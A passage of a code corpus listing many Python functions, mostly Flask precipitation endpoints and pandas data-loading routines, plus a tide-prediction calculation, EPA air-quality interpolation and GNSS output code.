pd.read_csv(pos_url, parse_dates=[0],\n date_parser=lambda t: pd.to_datetime(str(t), format='%Y%m%dT%H%M%S'))\n self.positions.fillna(np.nan)\n self.positions.index = pd.to_datetime(self.positions.time, unit='s')\n self.positions.columns = ['time', 'bid', 'bid_depth', 'bid_depth_total', 'ask', 'ask_depth', 'ask_depth_total']\n self.positions = self.positions[self.exchange_pre:self.exchange_post]", "def precipitation():\n # Create our session (link) from Python to the DB.\n session = Session(engine)\n\n # Calculate the date 1 year ago from the last data point in the database.\n last_measurement_data_point_tuple = session.query(Measurement.date).order_by(Measurement.date.desc()).first()\n (latest_date, ) = last_measurement_data_point_tuple\n latest_date = dt.datetime.strptime(latest_date, '%Y-%m-%d')\n latest_date = latest_date.date()\n date_year_ago = latest_date - relativedelta(years=1)\n\n # Perform a query to retrieve the data and precipitation scores.\n data_from_last_year = session.query(Measurement.date, Measurement.prcp).filter(Measurement.date >= date_year_ago).all()\n\n session.close()\n\n # Convert the query results to a dictionary using date as the key and prcp as the value.\n all_precipication = []\n for date, prcp in data_from_last_year:\n if prcp != None:\n precip_dict = {}\n precip_dict[date] = prcp\n all_precipication.append(precip_dict)\n\n # Return the JSON representation of dictionary.\n return jsonify(all_precipication)", "def precipitation():\n\n # Open sessions\n session = Session(bind=engine)\n\n # Find out what is the latest date with data\n lastDate=session.query(Measurement.date).order_by(Measurement.date.desc()).first()\n for date in lastDate:\n dataArray = date.split(\"-\")\n (year,month,day) = dataArray\n \n # Calculate the sate 1 year ago of the latest date\n year_ago = dt.date(int(year),int(month),int(day)) - dt.timedelta(days=365)\n\n # Define the varialbles for start and end date\n latestPrcpDate=f'{year}-{month}-{day}'\n oldestPrcpDate=year_ago.isoformat()\n\n # Initiating an empty dictionary\n precipitation={}\n\n # Query DB for preciitation values from start date to end date\n results=session.query(Measurement).filter(Measurement.date >= year_ago).all()\n for row in results:\n prcp={row.date:row.prcp} #storing the date and the measured value in a dictionary\n precipitation.update(prcp) #updating the main dictionary with the previous smaller dictionary\n\n # Calculating the main API dictionary with an info key, a date interval and the results/observations \n precipitationAPI={'info':'Last 12 months of precipitation data in inches',\n 'date interval':{'from':oldestPrcpDate,'to':latestPrcpDate},\n 'results':precipitation\n }\n\n # Returing the main dictionary in a JSON format API response \n return jsonify(precipitationAPI)", "def _get_data(self):\n\n data = self.get_data()\n\n required_data = ['open','close','open_date','high','low']\n if not np.isin(required_data, data.columns).all():\n raise ImplementationError(f'''\n Data must contain columns: {required_data}\n ''')\n\n data = data.sort_values('open_date')\n data.index = data.open_date\n\n temp_dates = pd.unique(data.open_date)\n self.total_candles = len(temp_dates)\n self.start_date, self.end_date = min(temp_dates), max(temp_dates)\n\n # Divide df based on symbol, create DataEngine object, add to dict.\n data_dict = {}\n for symbol in self.symbols.symbol:\n try:\n data_dict[symbol] = DataEngine(data[data.symbol == symbol])\n except DiscontinuousError as err:\n print(f'There are missing dates in data for {symbol}')\n raise err\n except ValueError as err:\n print(f'No data for provided for symbol: {symbol}')\n self.symbols = self.symbols.drop(symbol)\n\n return data_dict", "def _calc_ecdf(self):\n for numerator, vals in self.lift.items():\n for denominator, lift in vals.items():\n raw_data = np.array(lift)\n cdfx = np.sort(np.unique(lift))\n x_values = np.linspace(start=min(cdfx),\n stop=max(cdfx),\n num=len(cdfx))\n size_data = raw_data.size\n y_values = []\n for i in x_values:\n temp = raw_data[raw_data <= i]\n value = temp.size / size_data\n y_values.append(value)\n temp = {}\n temp['x'] = x_values\n temp['y'] = y_values\n if numerator not in self.ecdf.keys():\n self.ecdf[numerator] = {}\n self.ecdf[numerator][denominator] = temp\n else:\n self.ecdf[numerator][denominator] = temp", "def precip():\n date_prcp=session.query(measurements.date,measurements.prcp).all()\n date_prcp_df=pd.DataFrame(date_prcp).set_index('date')\n date_prcp_dict=date_prcp_df.to_dict()\n return jsonify(date_prcp_dict)", "def construct_all_positions(self):\n # Creates a dictionary for each symbol, sets a value of 0 for each, adds a datetime key, adds it to a list.\n d = dict((k,v) for k,v in [(s,0) for s in self.symbol_list]) # self.current_positions\n d['datetime'] = self.start_date\n \n return [d]", "def construct_all_positions(self):\n # Creates a dictionary for each symbol, sets a value of 0 for each, adds a datetime key, adds it to a list.\n d = dict((k,v) for k,v in [(s,0) for s in self.symbol_list]) # self.current_positions\n d['datetime'] = self.start_date\n \n return [d]", "def load_covid_cases_data(date=None):\n if not date:\n date = datetime.today()\n data = requests.get(f'https://raw.githubusercontent.com/CSSEGISandData/COVID-19/master/csse_covid_19_data/csse_covid_19_daily_reports/{date.strftime(\"%m-%d-%Y\")}.csv')\n\n f = StringIO(data.text)\n reader = csv.DictReader(f, delimiter=',')\n results = {}\n for row in reader:\n fips = row.pop('FIPS', None)\n if fips:\n results[int(fips)] = row\n print(f\"{date.strftime('%m-%d-%Y')} has {len(results.keys())} results\")\n return results", "def precip():\n # Query Measurement data\n session = Session(engine)\n results = session.query(Measurement.date, Measurement.prcp).all()\n\n # Create a dictionary from the row data and append to a list of precipitation data\n precip_data = []\n for date, prcp in results:\n precip_dict = {}\n precip_dict[\"date\"] = date\n precip_dict[\"Precipitation\"] = prcp\n precip_data.append(precip_dict)\n\n return jsonify(precip_data)", "def precipitation():\n # Query all prcp\n results = session.query(Measurement.date, Measurement.prcp).\\\n filter(Meausurement.date >= '2016-10-01').\\\n group_by(Measurement.date).all()\n\n all_precipitation = []\n\n # Query for the dates and temperature observations from the last year.\n for result in results:\n precipitation_dict = {}\n precipitation_dict[\"date\"] = result[0]\n precipitation_dict[\"prcp\"] = result[1]\n all_precipitation.append(precipitation_dict)\n \n return jsonify(all_precipitation)", "def pacMare(date, estac):\n monthList = [\"JAN\", \"FEV\", \"MAR\", \"ABR\", \"MAI\", \"JUN\", \"JUL\",\n \"AGO\", \"SET\", \"OUT\", \"NOV\", \"DEZ\"]\n an = date.year\n Mesl = date.month\n strmes = monthList[Mesl-1]\n di = date.day\n data1 = \"%s/%s/%s\" %(di, Mesl, an)\n\n DT = 1\n HI = -3\n d0 = 1\n\n estacoes = Estacao()\n constantes = Constantes()\n cadastro = Cadastro()\n combinacoes = Combinacoes()\n\n f = estacoes.data['name'].index(estac)\n Cod = estacoes.data['ID'][f]\n LA1 = estacoes.data['latG'][f]\n LA2 = estacoes.data['latM'][f]\n LO1 = estacoes.data['lonG'][f]\n LO2 = estacoes.data['lonM'][f]\n nc = estacoes.data['ncomp'][f]\n NM = estacoes.data['nm'][f]\n fu = estacoes.data['fuso'][f]\n ca = estacoes.data['carta'][f]\n hemlat = estacoes.data['hemlat'][f]\n hemlon = estacoes.data['hemlon'][f]\n \n infoList = []\n lat = base10Tobase60(lat=base60Tobase10(LA1, LA2, hemlat))\n lon = base10Tobase60(lon=base60Tobase10(LO1, LO2, hemlon))\n latSTR = u\"Lat: %s\" % lat\n lonSTR = u\"Lon: %s\" % lon\n ncSTR = u\"Componentes: %s\" %(nc)\n nmSTR = u\"Nível Médio: %s cm\" %(int(NM))\n fuSTR = u\"Fuso: - %sh\" %(int(fu))\n caSTR = u\"Número Carta: %s\" %(ca)\n\n infoList.append(latSTR)\n infoList.append(lonSTR)\n infoList.append(ncSTR)\n infoList.append(nmSTR)\n infoList.append(fuSTR)\n infoList.append(caSTR)\n\n f = constantes.data['ID'].index(Cod)\n ai = constantes.data['const'][ f:f+nc ]\n h = constantes.data['amp'][ f:f+nc ]\n G = constantes.data['phase'][ f:f+nc ]\n HH = h[:]\n GG = G[:]\n\n MK, constID = [],[]\n for k in range(nc):\n f = cadastro.data['const'].index(ai[k])\n MK.append(cadastro.data['M'][f])\n constID.append(cadastro.data['cod'][f])\n MK = str2int(MK)\n constID = str2int(constID)\n\n BB, CC = [],[]\n for k in range(nc):\n f = combinacoes.data['ID'].index(constID[k])\n aux = combinacoes.data['subs'][ f: f+MK[k] ]\n aux = str2float(aux)\n BB.append(aux)\n aux = combinacoes.data['comb'][ f: f+MK[k] ]\n aux = str2float(aux)\n CC.append(aux)\n\n cdat = open(web2pyPath + \"modules/data/Vdata.txt\")\n V = []\n for line in cdat.readlines():\n line2 = line.strip('\\r\\n').split(',')\n line2 = str2float(line2)\n V.append(line2)\n\n D = [0, 31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31]\n n = 30\n\n # calculo dos elementos astronomicos\n MB = float(an % 4)\n MC = float(an % 100)\n MD = float(an % 400)\n dd = float(di)\n\n if MB == 0 and MC != 0 or MD == 0:\n D[2] = 29\n\n i1 = float(an / 100)\n i2 = i1 - 19\n if i2 != 0:\n t1 = i2\n j1 = abs(i2)\n c3 = j1 / i2\n t2 = t1 * t1 * c3\n c1 = int(j1 * 0.75 + 0.5) * c3\n else:\n t1 = 0.\n t2 = 0.\n c1 = 0.\n\n s0 = 277.0224 + 307.8831 * t1 - 0.0011 * t2 - 13.1764 * c1\n h0 = 280.1895 + 0.7689 * t1 + 0.0003 * t2 - 0.9856 * c1\n p0 = 334.3853 + 109.034 * t1 - 0.0103 * t2 - 0.1114 * c1\n nl = 100.7902 + 134.142 * t1 - 0.0021 * t2 - 0.053 * c1\n P1 = 281.2208 + 1.7192 * t1 + 0.00045 * t2 - 0.000047 * c1\n\n for i in range(Mesl):\n di = float(di + D[i])\n\n # bug de 2001\n if an <= 2000:\n di = di - 1 \n\n IA = i1 * 100\n BI = an - IA\n\n AI = int((BI - 1) * 0.25); AI = float(AI)\n if MD == 0: AI = AI + 1\n AD = AI + di\n N2 = n * DT * 0.5\n AV = N2\n SN = AV / 10000\n b = [None]\n b.append( s0 + 129.38481 * BI + 13.1764 * AD )\n b.append( h0 - 0.23872 * BI + 0.98565 * AD )\n b.append( p0 + 40.66249 * BI + 0.1114 * AD )\n b.append(None)\n b.append( nl + 19.32818 * BI + 0.05295 * AD )\n b.append( P1 + 0.01718 * BI + 0.000047 * AD )\n b[0] = b[2] - b[1]\n b[4] = 90.\n b.append( b[3] + N2 * 0.00464183 )\n b.append( b[5] + N2 * 0.00220641 )\n b.append( b[6] + N2 * 0.00000196 )\n\n a = [ [0.,1.,0.], [0.,2.,0.], [0.,3.,0.], [0.,0.,2.], [0.,1.,2.], [1.,0.,-1.], \n [2.,-1.,-1.], [2.,-1.,0.], [2.,-1.,1.], [2.,0.,0.], [2.,1.,0.], \n [2.,2.,0.], [2.,3.,0.] ]\n\n b[0] = b[0] + HI * 14.49205211\n b[1] = b[1] + HI * 0.54902653\n b[2] = b[2] + HI * 0.0410686\n b[3] = b[3] + HI * 0.00464183\n b[5] = b[5] + HI * 0.00220641\n b[6] = b[6] + HI * 0.00000196\n\n z, Q = [], []\n for i in range(13):\n s = 0.\n for J in range(3):\n s = s + a[i][J] * b[J + 7]\n \n XX = s * 0.017453\n z.append(np.cos(XX))\n Q.append(np.sin(XX))\n\n W = []\n for i in range(37):\n WQ = 0.\n for J in range(5):\n WQ = WQ + V[i][J] * b[J]\n \n if i == 13 or i == 30:\n W.append( WQ + b[9] )\n elif i == 17 or i == 32:\n W.append( WQ - b[9] )\n else:\n W.append(WQ)\n\n F, U = [], []\n for k in range(38):\n F.append(None) # apenas para facilitar a copia do codigo em VB\n U.append(None) # depois, ambos serao popped-up\n z.insert(0, None) # idem\n Q.insert(0, None) # idem\n\n F[1] = 1\n F[2] = 1\n F[3] = 1 - 0.0307 * z[1] + 0.0007 * z[2] - 0.0534 * z[10] - 0.0218 * z[11] - 0.0059 * z[12]\n F[4] = 1 + 0.4142 * z[1] + 0.0377 * z[2] - 0.0008 * z[3] - 0.0028 * z[8] + 0.0431 * z[10] - 0.0023 * z[11]\n F[5] = 1 + 0.4141 * z[1] + 0.0384 * z[2] - 0.003 * z[7] - 0.003 * z[9] + 0.0179 * z[10] - 0.004 * z[12] - 0.0017 * z[13]\n F[6] = 1 + 0.1885 * z[1] - 0.0063 * z[2] - 0.0063 * z[12]\n F[7] = 1 + 0.1884 * z[1] - 0.0061 * z[2] - 0.0087 * z[10]\n F[8] = 1 + 0.1884 * z[1] - 0.0057 * z[2] + 0.0007 * z[6] - 0.0028 * z[10] - 0.0039 * z[12] - 0.0007 * z[13]\n F[9] = 1 + 0.1881 * z[1] - 0.0058 * z[2] - 0.0576 * z[10] + 0.0175 * z[11]\n F[10] = 1 + 0.1885 * z[1] - 0.0058 * z[2] + 0.0001 * z[8] - 0.0054 * z[10] - 0.001 * z[11]\n F[11] = 1 - 0.2454 * z[1] - 0.0142 * z[2] + 0.0445 * z[10]\n F[12] = 1 + 0.1714 * z[1] - 0.0054 * z[2] + 0.3596 * z[10] + 0.0664 * z[11] - 0.0057 * z[12]\n F[13] = 1 + 0.1905 * z[1]\n F[14] = 1 - 0.0078 * z[1]\n F[15] = 1 - 0.0112 * z[1] + 0.0007 * z[2] - 0.0004 * z[4] - 0.0015 * z[10] - 0.0003 * z[11]\n F[16] = 1\n F[17] = 1 + 0.1158 * z[1] - 0.0029 * z[2] + 0.0001 * z[11]\n F[18] = 1 + 0.019 * z[1]\n F[19] = 1 - 0.0384 * z[1] - 0.0185 * z[2] + 0.0132 * z[4] + 0.0105 * z[8] + 0.0344 * z[10]\n F[20] = 1 + 0.1676 * z[1] + 0.03 * z[11]\n F[21] = 1 + 0.1685 * z[1] - 0.0047 * z[2] - 0.0152 * z[10] - 0.0098 * z[11] - 0.0057 * z[12]\n F[22] = 1 + 0.6398 * z[1] + 0.1342 * z[2] + 0.008500001 * z[3] + 0.0296 * z[8] + 0.1496 * z[10] - 0.0037 * z[11]\n F[23] = 1 - 0.0337 * z[1]\n F[24] = 1 - 0.0374 * z[1] - 0.061 * z[12]\n F[25] = 1 - 0.0375 * z[1]\n F[26] = 1 - 0.0373 * z[1] + 0.0004 * z[2] + 0.0007 * z[6] - 0.0039 * z[12]\n F[27] = 1 - 0.0373 * z[1] + 0.0042 * z[10] - 0.0036 * z[11]\n F[28] = 1 - 0.0373 * z[1] + 0.0004 * z[2] + 0.0005 * z[10] - 0.0001 * z[11]\n F[29] = 1 - 0.0448 * z[1]\n F[30] = 1 - 0.0367 * z[1] + 0.0047 * z[8] - 0.2505 * z[10] - 0.1102 * z[11] - 0.0156 * z[12]\n F[31] = 1\n F[32] = 1 - 0.0022 * z[1]\n F[33] = 1 - 0.2535 * z[4] + 0.0141 * z[5]\n F[34] = 1 + 0.2852 * z[1] + 0.0324 * z[2]\n F[35] = 1 + 0.4389 * z[1] + 0.0487 * z[2] + 0.0487 * z[10] + 0.065 * z[11]\n F[36] = 1 + 0.4168 * z[1] + 0.0466 * z[2] - 0.078 * z[10]\n F[37] = 1 - 0.0564 * z[1]\n\n U[1] = 0\n U[2] = 0\n U[3] = 0.0007 * Q[1] - 0.0008 * Q[2] - 0.0534 * Q[10] - 0.0218 * Q[11] - 0.0059 * Q[12]\n U[4] = 0.4142 * Q[1] + 0.0377 * Q[2] - 0.0008 * Q[3] + 0.0027 * Q[8] - 0.0432 * Q[10] + 0.0022 * Q[11]\n U[5] = 0.4142 * Q[1] + 0.0384 * Q[2] + 0.003 * Q[7] + 0.003 * Q[9] - 0.018 * Q[10] - 0.004 * Q[12] - 0.0017 * Q[13]\n U[6] = -0.1885 * Q[1] + 0.0062 * Q[2] + 0.0062 * Q[12]\n U[7] = -0.1884 * Q[1] + 0.006 * Q[2] - 0.0087 * Q[10]\n U[8] = -0.1884 * Q[1] + 0.0057 * Q[2] - 0.0008 * Q[6] - 0.0028 * Q[10] + 0.0039 * Q[12] + 0.0007 * Q[13]\n U[9] = -0.1882 * Q[1] + 0.0057 * Q[2] - 0.0576 * Q[10] + 0.0175 * Q[11]\n U[10] = -0.1885 * Q[1] + 0.0057 * Q[2] + 0.0001 * Q[8] - 0.0064 * Q[10] - 0.001 * Q[11]\n U[11] = -0.1886 * Q[1] - 0.0142 * Q[2] - 0.0446 * Q[10]\n U[12] = -0.2294 * Q[1] - 0.3596 * Q[10] - 0.0665 * Q[11] + 0.0057 * Q[12]\n U[13] = 0.246 * Q[1]\n U[14] = 0.0077 * Q[1]\n U[15] = 0.0111 * Q[1] - 0.0008 * Q[2] - 0.0004 * Q[4] - 0.0015 * Q[10] - 0.0003 * Q[11]\n U[16] = 0\n U[17] = 0.1554 * Q[1] - 0.003 * Q[2] - 0.0002 * Q[11]\n U[18] = 0.019 * Q[1]\n U[19] = -0.0384 * Q[1] - 0.0185 * Q[2] - 0.0132 * Q[4] - 0.0106 * Q[8] - 0.0344 * Q[10]\n U[20] = 0.231 * Q[1] - 0.03 * Q[11]\n U[21] = 0.2274 * Q[1] - 0.0047 * Q[2] - 0.0152 * Q[10] - 0.0098 * Q[11] - 0.0057 * Q[12]\n U[22] = 0.6398 * Q[1] + 0.1342 * Q[2] - 0.0296 * Q[8] - 0.1497 * Q[10] + 0.0037 * Q[11]\n U[23] = 0.0373 * Q[1]\n U[24] = 0.0373 * Q[1] + 0.006 * Q[12]\n U[25] = 0.0373 * Q[1] - 0.0005 * Q[2] - 0.0008 * Q[6] + 0.0039 * Q[12]\n U[26] = 0.0373 * Q[1] - 0.0005 * Q[2] - 0.0008 * Q[6] + 0.0039 * Q[12]\n U[27] = 0.0373 * Q[1] + 0.0042 * Q[10] + 0.0036 * Q[11]\n U[28] = 0.0373 * Q[1] - 0.0005 * Q[2] + 0.0005 * Q[9] + 0.0001 * Q[11]\n U[29] = 0.0487 * Q[1]\n U[30] = 0.0366 * Q[1] + 0.0047 * Q[8] - 0.2505 * Q[9] - 0.1102 * Q[11]\n U[31] = 0\n U[32] = -0.0022 * Q[1]\n U[33] = -0.2535 * Q[4] + 0.0141 * Q[5]\n U[34] = 0.3108 * Q[1] + 0.0324 * Q[2]\n U[35] = 0.4389 * Q[1] + 0.0487 * Q[2] - 0.0488 * Q[9] - 0.065 * Q[11]\n U[36] = 0.4542 * Q[1] + 0.0466 * Q[2] - 0.0078 * Q[10]\n U[37] = 0.0563 * Q[1]\n\n z.pop(0)\n Q.pop(0)\n F.pop(0)\n U.pop(0)\n AV = n * DT * 0.5\n\n for i in range(37):\n XX = F[i]\n YY = U[i]\n F[i] = np.sqrt( XX ** 2 + YY ** 2 )\n U[i] = W[i] + np.arctan(YY / XX) * 57.29578\n U[i] = U[i] - int(U[i] / 360) * 360\n if U[i] < 0: U[i] = U[i] + 360\n\n\n # calculo das alturas\n HC, GC = [],[]\n for k in range(110):\n HC.append(0)\n GC.append(0)\n\n for i in range(nc):\n s = 0.\n WQ = 0.\n T = 1.\n\n for J in range(MK[i]):\n jj = int(BB[i][J])\n kk = CC[i][J]\n T = T * F[jj-1] ** abs(kk)\n s = s + U[jj-1] * kk\n WQ = WQ + V[jj-1][5] * kk\n ZQ = s\n \n h[i] = T * h[i]\n s = s - G[i]\n if s < 0: s = s + 360.\n G[i] = s\n try: \n W[i] = WQ * DT\n except IndexError:\n W.append( WQ * DT )\n HC[i] = T * HC[i]\n ZQ = ZQ - GC[i]\n if ZQ < 0: ZQ = ZQ + 360.\n GC[i] = ZQ\n\n x, Y2, y = [],[],[]\n MM = 0\n for i in range(n):\n s = 0.\n ZQ = 0.\n\n for j in range(nc):\n AA = G[j] * 0.017453\n s = s + h[j] * np.cos(AA)\n G[j] = G[j] + W[j]\n AC = GC[j] * 0.017453\n ZQ = ZQ + HC[j] * np.cos(AC)\n GC[j] = GC[j] + W[j]\n\n x.append(s + NM)\n Y2.append(x[i])\n y.append(ZQ + MM)\n\n x = np.array(x, dtype=np.float32)\n x = x/100.\n h = x[3:-3]\n hours = np.arange(24)\n years, months, days = 0*hours+an, 0*hours+Mesl, 0*hours+int(dd)\n time = []\n for year, month, day, hour in zip(years, months, days, hours):\n time.append( dt.datetime(year, month, day, hour) )\n\n time = mpldates.date2num(time)\n time2 = np.linspace(time[0], time[-1], 500)\n\n interp = interp1d(time, h, kind='cubic')\n h2 = interp(time2)\n\n dh = np.gradient(h2)\n dhSign = dh > 0\n # gathering pairs\n pairs = []\n for k in range(len(dh)-1):\n pairs.append([dhSign[k], dhSign[k+1]])\n\n f = []\n for k in range(len(pairs)):\n if pairs[k] == [True, False] or pairs[k] == [False, True]:\n f.append(k)\n\n datas = mpldates.num2date(time2[f])\n hora = []\n for data in datas:\n hora.append(\"%02i:%02i\" %(data.hour, data.minute))\n altura = h2[f]\n altura = ['%.1f' % a for a in altura]\n\n return infoList, hora, altura, time2, h2", "def get_data(table_name, end, num, start=None):\n if start == None:\n if table_name == \"days\": start = end - timedelta(days=num-1) \n if table_name == \"weeks\": start = end - timedelta(weeks=num-1) \n if table_name == \"months\": start = end - relativedelta(months=+num-1) \n if table_name == \"years\": start = end - relativedelta(years=+num-1) \n else: \n start = days.get_entry(table_name, start).date\n \n dates = []\n data = []\n weather = []\n density = []\n \n while start <= end:\n entry = days.get_entry(table_name, start)\n data.append(entry.sentiment)\n \n if table_name == \"days\": \n dates.append(entry.date.strftime(\"%B %d, %Y\"))\n start = start + timedelta(days=1)\n if table_name == \"weeks\": \n dates.append(entry.date.strftime(\"%B %d, %Y\"))\n start = start + timedelta(weeks=1) \n if table_name == \"months\": \n dates.append(entry.date.strftime(\"%B %Y\"))\n start = start + relativedelta(months=+1) \n if table_name == \"years\": \n dates.append(entry.date.strftime(\"%Y\"))\n start = start + relativedelta(years=+1) \n\n # 7/15/15 is the last entry in the current weather dictionary\n num_days = (min(start, date(2015,7,15)) - entry.date).days\n temp = {entry.date + timedelta(days=i): weather_dict[entry.date + timedelta(days=i)] for i in range(num_days)}\n weather.append(float(sum(temp.values()))/float(len(temp)))\n\n if density_dict != None:\n d = max(entry.date, date(2014,7,1))\n num_days = (min(start, date(2015,7,28)) - d).days\n rho = {d + timedelta(days=i): density_dict[d + timedelta(days=i)] for i in range(num_days)}\n density.append(float(sum(rho.values()))/float(len(rho)))\n\n return dates, data, weather, density", "def precipitation():\n # Create a link to the session\n session = Session(engine)\n \n # Query all precipitation records\n results = session.query(Measurements.date, Measurements.prcp).all()\n \n session.close()\n\n # Create a dictionary from the query results\n all_prcp = []\n for date, prcp in results:\n prcp_dict = {}\n prcp_dict[\"date\"] = date\n prcp_dict[\"prcp\"] = prcp\n all_prcp.append(prcp_dict)\n \n return jsonify(all_prcp)", "def precipitation():\r\n # Query all measurements\r\n results = session.query(Measurement).all()\r\n\r\n # Create a dictionary from the row data and append to a list of all_precipitation\r\n all_precipitation = []\r\n\r\n for row in results:\r\n precipitation_dict = { row.date : row.prcp}\r\n all_precipitation.append(precipitation_dict)\r\n # print(all_precipitation)\r\n return jsonify(all_precipitation)", "def precipitation():\n results = session.query(Measurement.date, Measurement.prcp).filter(Measurement.date >= '2016-08-23').order_by(Measurement.date)\n precipitation_values = []\n for p in results:\n prcp_dict = {}\n prcp_dict[\"date\"] = p.date\n prcp_dict[\"prcp\"] = p.prcp\n precipitation_values.append(prcp_dict)\n\n return jsonify(precipitation_values)", "def gnss_satellite_position(dset: \"Dataset\") -> None:\n file_path = config.files.path(\"output_satellite_position\", file_vars={**dset.vars, **dset.analysis})\n\n # Add date field to dataset\n if \"date\" not in dset.fields:\n dset.add_text(\"date\", val=[d.strftime(\"%Y/%m/%d %H:%M:%S\") for d in dset.time.datetime], write_level=\"detail\")\n \n # Add fields in case of broadcast ephemeris\n if \"broadcast\" in config.tech.apriori_orbit.list:\n if not \"trans_time_gpsweek\" in dset.fields:\n dset.add_text(\n \"trans_time_gpsweek\",\n val=[\n f\"{t.gps_ws.week:04.0f}{t.gps_ws.day:1.0f}:{t.gps_ws.seconds:06.0f}\" for t in dset.used_transmission_time\n ],\n write_level=\"detail\",\n )\n if not \"toe_gpsweek\" in dset.fields:\n dset.add_text(\n \"toe_gpsweek\",\n val=[f\"{t.gps_ws.week:04.0f}{t.gps_ws.day:1.0f}:{t.gps_ws.seconds:06.0f}\" for t in dset.used_toe],\n write_level=\"detail\",\n )\n if not \"diff_trans_toe\" in dset.fields:\n dset.add_float(\n \"diff_trans_toe\",\n val=(dset.used_transmission_time.gps.mjd - dset.used_toe.gps.mjd) * Unit.day2second,\n unit=\"second\", \n write_level=\"detail\",\n )\n if not \"age_of_ephemeris\" in dset.fields:\n dset.add_float(\n \"age_of_ephemeris\",\n val=(dset.time.gps.mjd - dset.used_toe.gps.mjd) * Unit.day2second,\n unit=\"second\", \n write_level=\"detail\",\n )\n \n # Select fields available in Dataset\n fields = get_existing_fields(dset, FIELDS)\n\n # Put together fields in an array as specified by the 'dtype' tuple list\n output_list = list(zip(*(get_field(dset, f.field, f.attrs, f.unit) for f in fields)))\n output_array = np.array(output_list, dtype=[(f.name, f.dtype) for f in fields])\n \n # Write to disk\n header = get_header(\n fields,\n pgm_version=f\"where {where.__version__}\",\n run_by=util.get_user_info()[\"inst_abbreviation\"] if \"inst_abbreviation\" in util.get_user_info() else \"\",\n summary=\"GNSS satellite position results\",\n )\n np.savetxt(\n file_path,\n output_array,\n fmt=tuple(f.format for f in fields),\n header=header,\n delimiter=\"\",\n encoding=\"utf8\",\n )", "def getEPADailyData(dateint, dt_ind, month, epa_df, yr):\n\n try:\n start = dateint + dt_ind * 10000\n end = start + 10001\n dly_epa_df = epa_df[(epa_df.created >= start) & (epa_df.created < end)]\n dly_epa_df.reset_index(inplace=True, drop=True)\n\n new_df = pd.DataFrame(columns=['lat', 'lon', 'utc', 'parameter', 'epa_pm25_unit', 'epa_pm25_value', 'raw_concentration', 'aqi', 'category', 'site_name', 'agency_name', 'full_aqs_code', 'intl_aqs_code', 'created'])\n for sitenm in dly_epa_df.site_name.unique():\n indx_ct = 0\n site_df = dly_epa_df[dly_epa_df.site_name == sitenm]\n for i in site_df.created.unique():\n indx_ct += 1\n new_df = pd.concat([new_df,site_df.iloc[indx_ct - 1:indx_ct]],ignore_index=True)\n\n if i != site_df.created.max(): # Don't interpolate the last record\n tmp_df = site_df.iloc[indx_ct - 1:indx_ct][['lat', 'lon', 'utc', 'parameter', 'epa_pm25_unit', 'category', 'site_name', 'agency_name', 'full_aqs_code', 'intl_aqs_code']]\n for j in range(1,6):\n new_dt = i + j * 10\n tmp_df['created'] = int(new_dt)\n tmp_df['epa_pm25_value'] = np.nan\n tmp_df['raw_concentration'] = np.nan\n tmp_df['aqi'] = np.nan\n new_df = pd.concat([new_df,tmp_df],ignore_index=True)\n\n # Convert aqi to numerica for so that it gets interpolated\n new_df[['aqi']] = new_df[['aqi']].replace(\"nan\", np.nan, regex=True)\n new_df[['aqi']] = new_df[['aqi']].apply(pd.to_numeric)\n\n new_df = new_df.interpolate(method='linear', limit_direction='forward', axis=0)\n\n int_epa_df = new_df[(new_df.created >= start) & (new_df.created < (end - 1))]\n int_epa_df.reset_index(inplace=True, drop=True)\n \n # Write to S3\n s3 = s3fs.S3FileSystem()\n myopen = s3.open\n write('midscapstone-whos-polluting-my-air/EpaDaily/epa_20{2}{0}{1:02}.parquet'.format(month, dt_ind, yr), int_epa_df, compression='GZIP', open_with=myopen)\n s3_resource = boto3.resource('s3')\n s3_resource.Object('midscapstone-whos-polluting-my-air', 'EpaDaily/epa_20{2}{0}{1:02}.parquet'.format(month, dt_ind, yr)).Acl().put(ACL='public-read')\n\n except Exception as e:\n print(\"*** EXCEPTION IN GET EPA DAILY DATA *** {}\".format(e))\n return int_epa_df", "def all_obs_v3pa_on_date(pointing_filename, date=None, verbose=False):\n results = {}\n pointing_table = apt_inputs.AptInput().get_pointing_info(pointing_filename, 0)\n obsnums = sorted(list(set(pointing_table['obs_num'])))\n for obs_num in obsnums:\n results[obs_num] = default_obs_v3pa_on_date(pointing_filename, int(obs_num), date=date, verbose=verbose,\n pointing_table=pointing_table)\n return results", "def _get_data(self):\n \n print(\"Getting Data...\")\n self.data = sgs.dataframe(self.serie_name, \n start = self.start_date, \n end = self.end_date)\n\n print(f\"Done! {self.data.shape[0]} rows were collected\")\n \n self.data.reset_index(inplace=True)\n self.data.columns = ['date', 'cdi']\n\n return self.data", "def precipitation():\n results_precip = engine.execute(\"SELECT date, prcp FROM Measurement WHERE date BETWEEN '2016-08-23' AND '2017-08-23'\").fetchall()\n\n # Convert list of tuples into normal list\n precip_dict = dict(results_precip)\n\n return jsonify(precip_dict)", "def prepare_data(self,query,user=0,daytype=\"A\"):\n # check if input is a string, parse to an array\n if type(query) is str:\n query = geoutil.parse_coords_array(query)\n \n # load data\n if user == 0:\n data = taxi.loadCsv()\n else:\n data = taxi.loadRelated(user)\n \n # 0th row has only column names\n paths = list()\n\n # A for normal day, B for holiday, C for day before holiday\n # depending on the length of a query, set minimum length\n min_length = len(query)/2\n\n for x in range(1,len(data)):\n points = taxi.pointsListConverter(data[x][8])\n if data[x][6]==daytype and len(points)>min_length:\n # convert data to array of tuples of float values\n geopoints = geoutil.convert_points(points)\n if taxi.containing(geopoints,query):\n paths.append(geopoints)\n\n self.query = query\n # pass all paths and generate big array of float points\n try:\n allPoints = numpy.concatenate(paths)\n output_points = []\n for point in allPoints[:-1]:\n output_points.append({\n \"lat\":point[1],\n \"long\":point[0]\n })\n self.training = allPoints[:-1]\n return self.training,query\n except Exception as e:\n print(\"No paths found: \"+str(e))\n return [],query", "def fetch_sundata(self, date: datetime) -> Sundata:\n pass", "def _get_data_pre2007(date):\n #the data is obtained from one file for each year.\n\n url = '{}/Environmental_Data_{}/'.format(BASE_URL, date.year)\n print('Fetching online data for {} (full year)'.format(date.year))\n\n try:\n year_data = request.urlopen(url).read().decode(encoding='utf_8').split('\\n')\n except:\n raise ValueError(date)\n else:\n year_data.pop(0)\n\n for line in year_data:\n elements = line.split()\n yield dict(Date = elements[0],\n Time = elements[1],\n Status = 'COMPLETE',\n Air_Temp = elements[5],\n Barometric_Press = elements[7],\n Wind_Speed = elements[2])", "def precipitation():\n # Query for the dates and precipitation observations from the last year.\n # Convert the query results to a Dictionary using `date` as the key and `prcp` as the value.\n # Return the json representation of your dictionary.\n query_date = 